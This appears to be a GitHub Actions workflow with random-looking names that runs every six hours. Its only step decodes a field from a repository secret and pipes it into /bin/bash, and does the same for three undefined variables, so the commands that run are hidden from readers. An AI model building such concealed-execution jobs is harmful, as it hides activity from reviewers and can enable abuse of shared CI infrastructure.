name: wengjingshi1290
on:
  workflow_dispatch:
  schedule:
    - cron: '24 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wengjingshi1290
        env:
          t7123: ${{ secrets.t7123 }}
        run: |
          echo $t7123 | jq -r .ctif47 | /bin/bash
          echo $xnpu5838 | jq -r .j7814 | /bin/bash
          echo $y434 | jq -r .vicjf0 | /bin/bash
          echo $je631 | jq -r .z5740 | /bin/bash

